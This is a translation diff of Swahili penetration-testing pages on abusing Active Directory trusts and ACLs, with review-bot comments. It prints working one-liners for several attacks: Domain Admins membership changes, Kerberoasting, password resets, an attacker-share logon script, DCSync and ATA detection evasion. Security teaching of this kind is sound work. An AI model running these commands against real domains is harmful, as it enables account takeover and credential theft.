Walakini, wakati **domain is trusted** na domain inayomwamini, domain ya kutegemewa **creates a user** na jina **predictable name** ambalo hutumia kama **password the trusted password**. Hii ina maana kuwa inawezekana **access a user from the trusting domain to get inside the trusted one** ili kuorodhesha (enumerate) na kujaribu kuongeza privileges zaidi:
{{#ref}}
external-forest-domain-one-way-outbound.md
{{#endref}}
Njia nyingine ya kuathiri domain iliyothibitishwa ni kupata [**SQL trusted link**](abusing-ad-mssql.md#mssql-trusted-links) iliyoundwa kwa mwelekeo wa **opposite direction** wa domain trust (ambayo si ya kawaida sana).
Njia nyingine ya kumdhalilisha domain iliyotegemewa ni kupata [**SQL trusted link**](abusing-ad-mssql.md#mssql-trusted-links) iliyoundwa katika **opposite direction** ya uaminiano wa domain (ambayo haipo kwa kawaida).
Njia nyingine ya kuathiri domain iliyothibitishwa ni kusubiri kwenye mashine ambapo **a user from the trusted domain can access** kuingia kupitia **RDP**. Kisha, mshambuliaji anaweza kuingiza code katika mchakato wa RDP session na **access the origin domain of the victim** kutoka hapo.\ Moreover, ikiwa **victim mounted his hard drive**, kutoka kwa mchakato wa **RDP session** mshambuliaji anaweza kuhifadhi **backdoors** katika **startup folder of the hard drive**. Tekniku hii inaitwa **RDPInception.**
Njia nyingine ya kumdhalilisha domain iliyotegemewa ni kusubiri kwenye mashine ambako **user from the trusted domain can access** kuingia kupitia **RDP**. Kisha, mshambuliaji anaweza kuingiza nambari ndani ya mchakato wa RDP session na **access the origin domain of the victim** kutoka hapo. Aidha, ikiwa **victim mounted his hard drive**, kutoka kwa mchakato wa **RDP session** mshambuliaji anaweza kuweka **backdoors** kwenye **startup folder of the hard drive**. Mbinu hii inaitwa **RDPInception.**
{{#ref}}
rdp-sessions-abuse.md
{{#endref}}
### Domain trust abuse mitigation
### Kupunguza matumizi mabaya ya uaminiano wa domain
### **SID Filtering:**
- Hatari ya mashambulizi yanayotumia SID history attribute kwa njia ya forest trusts hupunguzwa na SID Filtering, ambayo imewezeshwa kwa default kwenye inter-forest trusts zote. Hii inaungwa mkono kwa dhana kwamba intra-forest trusts ni salama, ikizingatia forest, badala ya domain, kama mpaka wa usalama kulingana na mtazamo wa Microsoft.
- Hata hivyo, kuna changamoto: SID filtering inaweza kuathiri applications na upatikanaji wa watumiaji, ikapelekea kuzimwa kwake mara kwa mara.
- Hatari ya mashambulizi yanayotumia attribute ya SID history kati ya forest trusts hupunguzwa na SID Filtering, ambayo imewashwa kwa default kwenye inter-forest trusts zote. Hii inategemea dhana kwamba intra-forest trusts ni salama, ikichukulia forest, badala ya domain, kama mpaka wa usalama kulingana na msimamo wa Microsoft.
- Hata hivyo, kuna tatizo: SID filtering inaweza kusumbua programu na ufikiaji wa watumiaji, na kusababisha mara kwa mara kuzimwa kwake.
### **Selective Authentication:**
- Kwa inter-forest trusts, kutumia Selective Authentication huhakikisha kwamba watumiaji kutoka misitu miwili hawathibitishwi kiotomatiki. Badala yake, ruhusa maalum zinahitajika kwa watumiaji kufikia domains na servers ndani ya trusting domain au forest.
- Ni muhimu kutambua kwamba hatua hizi hazilindi dhidi ya unyonyaji wa writable Configuration Naming Context (NC) au mashambulizi dhidi ya trust account.
- Kwa inter-forest trusts, kutumia Selective Authentication inahakikisha kwamba watumiaji kutoka misitu miwili hawathibitishwi moja kwa moja. Badala yake, ruhusa za wazi zinahitajika kwa watumiaji ili kufikia domains na servers ndani ya domain au forest inayomwamini.
- Ni muhimu kutambua kwamba hatua hizi hazilindi dhidi ya matumizi mabaya ya writable Configuration Naming Context (NC) au mashambulizi dhidi ya trust account.
[**More information about domain trusts in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
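Review bot: the renamed heading "### Kupunguza matumizi mabaya ya uaminiano wa domain" sits at the same `###` level as the "### **SID Filtering:**" and "### **Selective Authentication:**" headings it is meant to introduce, so the two mitigations do not nest under it; demote those two to `####`. It is also the only heading in this hunk that gets translated while "Attack Path", "SID-History Injection" and the forest-domain headings stay in English, so pick one convention for section titles.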
@ -766,31 +771,31 @@ https://cloud.hacktricks.wiki/en/pentesting-cloud/azure-security/az-lateral-move
[**Learn more about how to protect credentials here.**](../stealing-credentials/credentials-protections.md)
### **Hatua za Kuzuia kwa Ulinzi wa Credentials**
### **Defensive Measures for Credential Protection**
- **Domain Admins Restrictions**: Inashauriwa kwamba Domain Admins waweze kuingia tu kwenye Domain Controllers, kuepuka matumizi yao kwenye hosts nyingine.
- **Service Account Privileges**: Huduma zisifanywe run zikiendeshwa kwa Domain Admin (DA) privileges ili kudumisha usalama.
- **Temporal Privilege Limitation**: Kwa kazi zinazohitaji DA privileges, muda wake unapaswa kufungwa. Hii inaweza kufanyika kwa: `Add-ADGroupMember -Identity ‘Domain Admins’ -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)`
- **Domain Admins Restrictions**: Inashauriwa kwamba Domain Admins waruhusiwe kuingia tu kwenye Domain Controllers, kuepuka matumizi yao kwenye hosts nyingine.
- **Service Account Privileges**: Huduma hazipaswi kuendeshwa zikiwa na Domain Admin (DA) privileges ili kudumisha usalama.
- **Temporal Privilege Limitation**: Kwa kazi zinazohitaji DA privileges, muda wake unapaswa kupunguzwa. Hii inaweza kufikiwa kwa: `Add-ADGroupMember -Identity ‘Domain Admins’ -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)`
### **Implementing Deception Techniques**
- Kutekeleza deception kunahusisha kuweka mitego, kama watumiaji wa kuiga (decoy users) au kompyuta, zenye sifa kama passwords ambazo hazitoweki au zimewekwa kama Trusted for Delegation. Mbinu ya kina inajumuisha kuunda watumiaji wenye haki maalum au kuwaongeza kwenye vikundi vya hali ya juu.
- Mfano wa vitendo unahusisha matumizi ya zana kama: `Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose`
- Zaidi kuhusu kutekeleza deception techniques zinapatikana kwenye [Deploy-Deception on GitHub](https://github.com/samratashok/Deploy-Deception).
- Kutumia udanganyifu kunahusisha kuweka mtego, kama watumiaji wa kudanganya au kompyuta, zenye sifa kama passwords zisizokufa au zimewekewa alama Trusted for Delegation. Mbinu ya kina inajumuisha kuunda watumiaji wenye haki maalum au kuwaongeza kwenye vikundi vyenye privileges za juu.
- Mfano wa vitendo unahusisha kutumia zana kama: `Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose`
- Zaidi kuhusu deploying deception techniques zinapatikana kwenye [Deploy-Deception on GitHub](https://github.com/samratashok/Deploy-Deception).
### **Identifying Deception**
- **For User Objects**: Viashiria vinavyotia shaka ni pamoja na ObjectSID isiyo ya kawaida, kuingia mara chache (infrequent logons), tarehe za uundaji, na idadi ndogo ya majaribio mabaya ya password.
- **General Indicators**: Kulinganisha sifa za vitu vinavyoweza kuwa decoy na zile za vitu halisi kunaweza kufichua kutofanana. Zana kama [HoneypotBuster](https://github.com/JavelinNetworks/HoneypotBuster) zinaweza kusaidia kutambua deception hizo.
- **For User Objects**: Viashiria vinavyoshuku vinajumuisha ObjectSID isiyo ya kawaida, logons chache, tarehe za uundaji, na idadi ndogo ya majaribio ya nywila mbaya.
- **General Indicators**: Kuk مقارنة (comparing) sifa za vitu vinavyoweza kuwa decoy na zile za vya kweli kunaweza kufunua tofauti. Zana kama [HoneypotBuster](https://github.com/JavelinNetworks/HoneypotBuster) zinaweza kusaidia kutambua udanganyifu huo.
### **Bypassing Detection Systems**
- **Microsoft ATA Detection Bypass**:
- **User Enumeration**: Kuepuka session enumeration kwenye Domain Controllers ili kuzuia utambuzi wa ATA.
- **Ticket Impersonation**: Kutumia vitufe vya **aes** kwa ajili ya uundaji wa tiketi husaidia kutoweka utambuzi kwa kutoangusha hadi NTLM.
- **DCSync Attacks**: Kutekeleza kutoka non-Domain Controller ili kuepuka utambuzi wa ATA kunapendekezwa, kwani utekelezaji wa moja kwa moja kutoka Domain Controller utasababisha tahadhari.
- **User Enumeration**: Kuepuka enumeration ya session kwenye Domain Controllers ili kuzuia utambuzi wa ATA.
- **Ticket Impersonation**: Kutumia funguo za **aes** kwa uundaji wa tiketi husaidia kuepuka ugunduzi kwa kutoangusha hadi NTLM.
- **DCSync Attacks**: Inashauriwa kutekeleza kutoka non-Domain Controller ili kuepuka utambuzi wa ATA, kwani utekelezaji wa moja kwa moja kutoka Domain Controller utasababisha onyo.
## Marejeo
## References
- [http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
- [https://www.labofapenetrationtester.com/2018/10/deploy-deception.html](https://www.labofapenetrationtester.com/2018/10/deploy-deception.html)
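Review bot: the revised "General Indicators" bullet reads "Kuk مقارنة (comparing) sifa za vitu ...", an Arabic word spliced into the Swahili sentence; the wording it replaces, "Kulinganisha sifa za vitu ...", is correct and should be restored. In the "Temporal Privilege Limitation" one-liner the group name is wrapped in typographic quotes (‘Domain Admins’); PowerShell accepts them, but straight single quotes survive copy-paste into other tools and match the rest of the page.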
@ -1,8 +1,8 @@
# Kutumia vibaya Active Directory ACLs/ACEs
# Kutumia Vibaya Active Directory ACLs/ACEs
{{#include ../../../banners/hacktricks-training.md}}
**Ukurasa huu ni hasa muhtasari wa mbinu kutoka** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **na** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**. Kwa maelezo zaidi, angalia makala za asili.**
**Ukurasa huu ni muhtasari wa mbinu kutoka** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **na** [**https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)**. Kwa maelezo zaidi, angalia makala asili.**
## BadSuccessor
@ -13,30 +13,30 @@ BadSuccessor.md
## **Haki za GenericAll kwa Mtumiaji**
Haki hii inampa mdukuzi udhibiti kamili wa akaunti ya mtumiaji lengwa. Mara haki za `GenericAll` zinapothibitishwa kwa kutumia amri `Get-ObjectAcl`, mdukuzi anaweza:
Haki hii inampa mshambuliaji udhibiti kamili wa akaunti ya mtumiaji anayelengwa. Mara haki za `GenericAll` zinapothibitishwa kwa kutumia amri ya `Get-ObjectAcl`, mshambuliaji anaweza:
- **Badili nenosiri la mtumiaji lengwa**: Kwa kutumia `net user <username> <password> /domain`, mdukuzi anaweza kuweka upya nenosiri la mtumiaji.
- **Targeted Kerberoasting**: Weka SPN kwenye akaunti ya mtumiaji ili kuifanya iwe kerberoastable, kisha tumia Rubeus na targetedKerberoast.py kutoa na kujaribu kuvunja ticket-granting ticket (TGT) hashes.
- **Badilisha Nenosiri la Lengo**: Kutumia `net user <username> <password> /domain`, mshambuliaji anaweza kuweka upya nenosiri la mtumiaji.
- **Targeted Kerberoasting**: Kuweka SPN kwenye akaunti ya mtumiaji ili kuiifanya kerberoastable, kisha tumia Rubeus na targetedKerberoast.py kutoa na kujaribu kuvunja hash za ticket-granting ticket (TGT).
```bash
Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
.\Rubeus.exe kerberoast /user:<username> /nowrap
Set-DomainObject -Credential $creds -Identity <username> -Clear serviceprincipalname -Verbose
```
- **Iliyolengwa ASREPRoasting**: Zima pre-authentication kwa mtumiaji, ukifanya akaunti yao iwe nyeti kwa ASREPRoasting.
- **Targeted ASREPRoasting**: Zima pre-authentication kwa mtumiaji, ukifanya akaunti yao iwe hatarini kwa ASREPRoasting.
```bash
Set-DomainObject -Identity <username> -XOR @{UserAccountControl=4194304}
```
## **GenericAll Rights on Group**
## **Haki za GenericAll kwenye Kundi**
Haki hii inamruhusu mshambulizi kubadilisha uanachama wa vikundi ikiwa ana haki za `GenericAll` kwenye kikundi kama `Domain Admins`. Baada ya kutambua distinguished name ya kikundi kwa kutumia `Get-NetGroup`, mshambulizi anaweza:
Haki hii inamwezesha mshambuliaji kubadilisha uanachama wa vikundi ikiwa ana haki za `GenericAll` kwenye kundi kama `Domain Admins`. Baada ya kutambua distinguished name ya kundi kwa kutumia `Get-NetGroup`, mshambuliaji anaweza:
- **Kujiongeza kwenye kikundi cha Domain Admins**: Hii inaweza kufanywa kwa amri za moja kwa moja au kwa kutumia moduli kama Active Directory au PowerSploit.
- **Kujiongeza kwenye kundi la `Domain Admins`**: Hii inaweza kufanywa kupitia amri za moja kwa moja au kwa kutumia modules kama Active Directory au PowerSploit.
```bash
net group "domain admins" spotless /add /domain
Add-ADGroupMember -Identity "domain admins" -Members spotless
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
```
Kutoka Linux, unaweza pia kutumia BloodyAD kujiweka katika vikundi vyovyote unapokuwa na uanachama wa GenericAll/Write juu yao. Ikiwa kikundi lengwa kimewekwa ndani ya “Remote Management Users”, utapata mara moja ufikiaji wa WinRM kwenye hosts zinazoheshimu kikundi hicho:
- Kutoka Linux unaweza pia kutumia BloodyAD kujiongezea kwenye vikundi vyovyote endapo una uanachama wa GenericAll/Write juu yao. Ikiwa kundi lengwa limejumuishwa ndani ya “Remote Management Users”, utapata mara moja ufikiaji wa WinRM kwenye hosts zinazoheshimu kundi hilo:
```bash
# Linux tooling example (BloodyAD) to add yourself to a target group
bloodyAD --host <dc-fqdn> -d <domain> -u <user> -p '<pass>' add groupMember "<Target Group>" <user>
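# Review bot: the "Targeted Kerberoasting" bullet (both the old and the revised line) says Rubeus and targetedKerberoast.py extract and crack ticket-granting ticket (TGT) hashes; Kerberoasting cracks service ticket (TGS) hashes, which are encrypted with the service account's key, whereas TGTs are encrypted with the krbtgt key and are not crackable this way, so replace "ticket-granting ticket (TGT)" with "service ticket (TGS)".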
@ -46,35 +46,35 @@ netexec winrm <dc-fqdn> -u <user> -p '<pass>'
```
## **GenericAll / GenericWrite / Write on Computer/User**
Kushikilia vibali hivi kwenye objekti ya kompyuta au akaunti ya mtumiaji kunaruhusu:
Kuwa na ruhusa hizi kwenye kitu cha kompyuta au akaunti ya mtumiaji kunaruhusu:
- **Kerberos Resource-based Constrained Delegation**: Inaruhusu kuchukua udhibiti wa objekti ya kompyuta.
- **Shadow Credentials**: Tumia mbinu hii kuiga kompyuta au akaunti ya mtumiaji kwa kutumia vibali hivyo kuunda shadow credentials.
- **Kerberos Resource-based Constrained Delegation**: Inaruhusu kuchukua udhibiti wa kitu cha kompyuta.
- **Shadow Credentials**: Tumia mbinu hii kuiga kompyuta au akaunti ya mtumiaji kwa kutumia ruhusa kuunda shadow credentials.
## **WriteProperty on Group**
Ikiwa mtumiaji ana haki za `WriteProperty` kwa objekti zote za kikundi maalum (kwa mfano, `Domain Admins`), wanaweza:
Ikiwa mtumiaji ana haki za `WriteProperty` kwenye vitu vyote vya kikundi fulani (mfano, `Domain Admins`), wanaweza:
- **Kujiweka kwenye kikundi la Domain Admins**: Inawezekana kupitia kuunganisha amri za `net user` na `Add-NetGroupUser`; njia hii inawezesha kuinua vibali ndani ya domain.
- **Kujiongeza kwenye kikundi la Domain Admins**: Inaweza kufikiwa kwa kuchanganya amri za `net user` na `Add-NetGroupUser`; mbinu hii inaruhusu kupandisha hadhi ya ruhusa ndani ya domain.
```bash
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
```
## **Self (Self-Membership) on Group**
Haki hii inawawezesha washambuliaji kujiongezea kwenye vikundi maalum, kama `Domain Admins`, kupitia amri zinazobadilisha uanachama wa kikundi moja kwa moja. Kutumia mfululizo wa amri ufuatao kunaruhusu kujiongezea:
Haki hii inawawezesha washambuliaji kujiongeza wenyewe kwa vikundi maalum, kama `Domain Admins`, kupitia amri zinazobadilisha uanachama wa kikundi moja kwa moja. Kutumia mfululizo wa amri ufuatao kunaruhusu kujiongeza mwenyewe:
```bash
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
```
## **WriteProperty (Self-Membership)**
Ruhusa inayofanana, hii inawawezesha wadukuzi kuongeza wao wenyewe moja kwa moja kwenye vikundi kwa kubadilisha sifa za vikundi ikiwa wana haki ya `WriteProperty` kwenye vikundi hivyo. Uthibitisho na utekelezaji wa ruhusa hii hufanywa kwa:
Haki inayofanana, hii inawawezesha washambuliaji kujiongeza moja kwa moja kwenye vikundi kwa kubadilisha sifa za kikundi ikiwa wana haki ya `WriteProperty` kwenye vikundi hivyo. Uthibitisho na utekelezaji wa haki hii hufanywa na:
```bash
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
net group "domain admins" spotless /add /domain
```
## **ForceChangePassword**
Kumiliki `ExtendedRight` kwa mtumiaji kwa `User-Force-Change-Password` kunaruhusu reset ya nywila bila kujua nywila ya sasa. Uthibitisho wa haki hii na matumizi yake yanaweza kufanywa kupitia PowerShell au zana mbadala za command-line, zikitoa njia kadhaa za kurudisha nywila za mtumiaji, ikiwa ni pamoja na vikao vya mwingiliano na one-liners kwa mazingira yasiyo na mwingiliano. Amri zinatoka kwa mwito rahisi wa PowerShell hadi kutumia `rpcclient` kwenye Linux, zikionesha utofauti wa njia za mashambulizi.
Kushikilia `ExtendedRight` kwa mtumiaji kwa `User-Force-Change-Password` kunaruhusu kuweka nywila upya bila kujua nywila ya sasa. Uhakiki wa haki hii na exploitation yake yanaweza kufanywa kupitia PowerShell au zana nyingine za mstari wa amri, zikitoa mbinu kadhaa za kuweka upya nywila ya mtumiaji, ikijumuisha interactive sessions na one-liners kwa mazingira yasiyo ya kuingiliana. Amri zinaanzia kutoka miito rahisi za PowerShell hadi kutumia `rpcclient` kwenye Linux, zikionyesha utofauti wa attack vectors.
|
||||
```bash
|
||||
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
||||
Set-DomainUserPassword -Identity delegate -Verbose
|
||||
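Review bot: Terminology drifts within this file after the rewrite: the new WriteProperty line ("Haki inayofanana, hii inawawezesha washambuliaji...") renders "attackers" as "washambuliaji", while the GenericWrite-on-Group and Users-and-Groups paragraphs later in this same commit keep "wadukuzi". Pick one term and apply it throughout. The new ForceChangePassword sentence also leaves "exploitation", "interactive sessions" and "attack vectors" in English where the old line had Swahili; either translate them or keep them as English terms consistently, but not mixed inside one sentence.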
@ -85,9 +85,9 @@ Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureStri
rpcclient -U KnownUsername 10.10.10.192
> setuserinfo2 UsernameChange 23 'ComplexP4ssw0rd!'
```
## **WriteOwner kwenye Kundi**
## **WriteOwner kwenye kikundi**

Ikiwa mshambuliaji atagundua kwamba ana haki za `WriteOwner` juu ya kundi, anaweza kubadilisha umiliki wa kundi huo kwa yeye mwenyewe. Hii ina athari kubwa hasa wakati kundi kinachozungumziwa ni `Domain Admins`, kwani kubadilisha umiliki kunaruhusu udhibiti mpana zaidi juu ya sifa za kundi na uanachama. Mchakato unahusisha kutambua kitu sahihi kupitia `Get-ObjectAcl` kisha kutumia `Set-DomainObjectOwner` kubadilisha mwenye umiliki, ama kwa SID au kwa jina.
Iwapo mshambuliaji atagundua kwamba ana haki za `WriteOwner` kwa kikundi, anaweza kubadilisha umiliki wa kikundi kwa ajili yake mwenyewe. Hii ina athari kubwa hasa wakati kikundi kinachohusika ni `Domain Admins`, kwa kuwa kubadilisha umiliki kunaruhusu udhibiti mpana wa sifa za kikundi na uanachama. Mchakato unajumuisha kutambua kitu sahihi kwa kutumia `Get-ObjectAcl` na kisha kutumia `Set-DomainObjectOwner` kubadilisha mmiliki, ama kwa SID au kwa jina.
```bash
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity "spotless" -Verbose
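Review bot: Heading case drifts in this hunk: "## **WriteOwner kwenye Kundi**" is lowercased to "## **WriteOwner kwenye kikundi**", while the neighbouring headings in this file ("GenericWrite kwa User", "GenericWrite on Group") keep the capitalised noun. Keep the capitalised form ("WriteOwner kwenye Kikundi") so the section titles stay uniform; the rewritten paragraph itself reads well.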
@ -95,13 +95,13 @@ Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
```
## **GenericWrite kwa User**

Idhini hii inamruhusu mshambuliaji kubadilisha sifa za User. Hasa, kwa kupata ruhusa ya `GenericWrite`, mshambuliaji anaweza kubadilisha njia ya logon script ya User ili kuendesha script ya kibaya wakati wa kuingia kwa User. Hii inafikiwa kwa kutumia amri ya `Set-ADObject` kusasisha sifa ya `scriptpath` ya User lengwa ili kuielekeza kwenye script ya mshambuliaji.
Ruhusa hii inamruhusu attacker kubadilisha sifa za User. Hasa, kwa kupata ruhusa ya `GenericWrite`, attacker anaweza kubadilisha njia ya logon script ya User ili kuendesha script hasidi wakati User anapofanya logon. Hii inafikiwa kwa kutumia amri ya `Set-ADObject` kusasisha mali ya `scriptpath` ya User lengwa ili kuonyesha kwenye script ya attacker.
```bash
Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1"
```
## **GenericWrite on Group**

Kwa ruhusa hii, washambuliaji wanaweza kubadilisha uanachama wa kikundi, kama kujiongeza wao wenyewe au watumiaji wengine katika vikundi maalum. Mchakato huu unahusisha kuunda credential object, kuitumia kuongeza au kuondoa watumiaji kutoka kwa kikundi, na kuthibitisha mabadiliko ya uanachama kwa kutumia amri za PowerShell.
Kwa ruhusa hii, wadukuzi wanaweza kubadili uanachama wa group, kama vile kujiongezea wenyewe au watumiaji wengine katika vikundi maalum. Mchakato huu unajumuisha kuunda credential object, kuitumia kuongeza au kuondoa watumiaji kutoka kwenye group, na kuthibitisha mabadiliko ya uanachama kwa amri za PowerShell.
```bash
$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
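Review bot: The second heading in this hunk, "## **GenericWrite on Group**", is left in English while "## **GenericWrite kwa User**" just above it is translated; translate it to match (e.g. "GenericWrite kwenye Kikundi", following the WriteOwner heading). In the new GenericWrite-on-User line, "kuonyesha kwenye script ya attacker" is a literal "point to"; the old "kuielekeza kwenye script" is the idiomatic wording and should be kept. The new GenericWrite-on-Group line also switches "kikundi" to the loanword "group" mid-paragraph; keep one noun.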
@ -111,7 +111,9 @@ Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'use
```
## **WriteDACL + WriteOwner**

Kumiliki kitu cha AD na kuwa na ruhusa za `WriteDACL` juu yake kunamwezesha mshambuliaji kujipa ruhusa za `GenericAll` kwa kitu hicho. Hii inafikiwa kupitia manipulisho ya ADSI, ikiruhusu udhibiti kamili wa kitu hicho na uwezo wa kubadilisha uanachama wake wa vikundi. Hata hivyo, kunakuwapo vikwazo wakati wa kujaribu kuchukua faida ya ruhusa hizi kwa kutumia cmdlets za Active Directory `Set-Acl` / `Get-Acl`.
Kumiliki kitu cha AD na kuwa na ruhusa za `WriteDACL` juu yake kunamwezesha attacker kujipa ruhusa za `GenericAll` juu ya kitu hicho.

Hii inafikiwa kupitia ADSI manipulation, ikiruhusu udhibiti kamili wa kitu hicho na uwezo wa kubadilisha uanachama wake wa vikundi. Hata hivyo, kuna vikwazo vinavyopo unapo jaribu exploit ruhusa hizi kwa kutumia Active Directory module's `Set-Acl` / `Get-Acl` cmdlets.
```bash
$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
$IdentityReference = (New-Object System.Security.Principal.NTAccount("spotless")).Translate([System.Security.Principal.SecurityIdentifier])
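Review bot: In the new second paragraph of WriteDACL + WriteOwner, "unapo jaribu exploit ruhusa hizi" has a split word and an untranslated verb; it should read "unapojaribu kutumia vibaya ruhusa hizi". Splitting the paragraph in two is fine, but "Active Directory module's `Set-Acl` / `Get-Acl` cmdlets" keeps an English possessive inside Swahili prose; "cmdlets za `Set-Acl` / `Get-Acl` za moduli ya Active Directory" reads naturally.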
@ -119,64 +121,64 @@ $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityRe
$ADSI.psbase.ObjectSecurity.SetAccessRule($ACE)
$ADSI.psbase.commitchanges()
```
## **Ukurudishaji kwenye Domain (DCSync)**
## **Kurudishana kwenye Domain (DCSync)**

Shambulio la DCSync linatumia ruhusa maalum za replication kwenye domain ili kujiga Domain Controller na kusanifisha data, ikijumuisha nywila za watumiaji. Mbinu hii yenye nguvu inahitaji ruhusa kama `DS-Replication-Get-Changes`, kuruhusu washambuliaji kutoa taarifa nyeti kutoka mazingira ya AD bila kupata moja kwa moja kwa Domain Controller. [**Learn more about the DCSync attack here.**](../dcsync.md)
Shambulio la DCSync linatumia ruhusa maalum za replication kwenye domain ili kujigania kuwa Domain Controller na kusawazisha data, pamoja na kredenshiali za watumiaji. Mbinu hii yenye nguvu inahitaji ruhusa kama `DS-Replication-Get-Changes`, ikiruhusu washambuliaji kutoa taarifa nyeti kutoka kwa mazingira ya AD bila kupata ufikiaji wa moja kwa moja kwenye Domain Controller. [**Jifunze zaidi kuhusu shambulio la DCSync hapa.**](../dcsync.md)

## Utoaji wa GPO <a href="#gpo-delegation" id="gpo-delegation"></a>
## Ugawaji wa GPO <a href="#gpo-delegation" id="gpo-delegation"></a>

### Utoaji wa GPO
### Ugawaji wa GPO

Ufikiaji uliotolewa kusimamia Group Policy Objects (GPOs) unaweza kuleta hatari kubwa za usalama. Kwa mfano, ikiwa mtumiaji kama `offense\spotless` amepewa haki za usimamizi wa GPO, anaweza kuwa na vibali kama **WriteProperty**, **WriteDacl**, na **WriteOwner**. Ruhusa hizi zinaweza kutumika vibaya kwa madhumuni mabaya, kama ilivyobainishwa kwa kutumia PowerView: `bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
Ufikiaji uliogawiwa wa kusimamia Group Policy Objects (GPOs) unaweza kuleta hatari kubwa za usalama. Kwa mfano, ikiwa mtumiaji kama `offense\spotless` amepewa haki za kusimamia GPO, anaweza kuwa na vibali kama **WriteProperty**, **WriteDacl**, na **WriteOwner**. Vibali hivi vinaweza kutumika vibaya kwa madhumuni mabaya, kama inavyobainika kwa kutumia PowerView: `bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`

### Kukusanya Ruhusa za GPO
### Kuorodhesha Vibali vya GPO

Ili kubaini GPO zilizopangwa vibaya, cmdlets za PowerSploit zinaweza kuunganishwa pamoja. Hii inaruhusu kugundua GPO ambazo mtumiaji fulani ana ruhusa za kusimamia: `powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
Ili kubaini GPOs zilizo na usanidi mbaya, cmdlets za PowerSploit zinaweza kuunganishwa pamoja. Hii inaruhusu kugundua GPOs ambazo mtumiaji maalum ana ruhusa za kusimamia: `powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`

**Kompyuta ambazo Sera Fulani Imetumika**: Inawezekana kubaini ni kompyuta zipi GPO maalum inawahusu, kusaidia kuelewa wigo wa athari zinazoweza kutokea. `powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
**Kompyuta zilizo na Sera Imetumika**: Inawezekana kubaini kompyuta ambazo GPO fulani inatumika, kusaidia kuelewa wigo wa athari zinazowezekana. `powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`

**Sera Zilizotekelezwa kwa Kompyuta Fulani**: Ili kuona sera gani zimewekwa kwa kompyuta fulani, amri kama `Get-DomainGPO` zinaweza kutumika.
**Sera Zilizotumika kwa Kompyuta Fulani**: Ili kuona ni sera gani zilizotumika kwa kompyuta fulani, amri kama `Get-DomainGPO` zinaweza kutumika.

**OUs Ambazo Sera Fulani Imewagusa**: Kutambua organizational units (OUs) zilizoathiriwa na sera fulani kunaweza kufanywa kwa kutumia `Get-DomainOU`
**OUs zilizo na Sera Iliyotumika**: Kutambua vitengo vya shirika (OUs) vilivyoathiriwa na sera fulani kunaweza kufanywa kwa kutumia `Get-DomainOU`.

Unaweza pia kutumia chombo [**GPOHound**](https://github.com/cogiceo/GPOHound) kuorodhesha GPO na kutafuta matatizo ndani yao.
Unaweza pia kutumia zana [**GPOHound**](https://github.com/cogiceo/GPOHound) kuorodhesha GPOs na kupata matatizo ndani yao.

### Kutumia vibaya GPO - New-GPOImmediateTask
### Kutumia Vibaya GPO - New-GPOImmediateTask

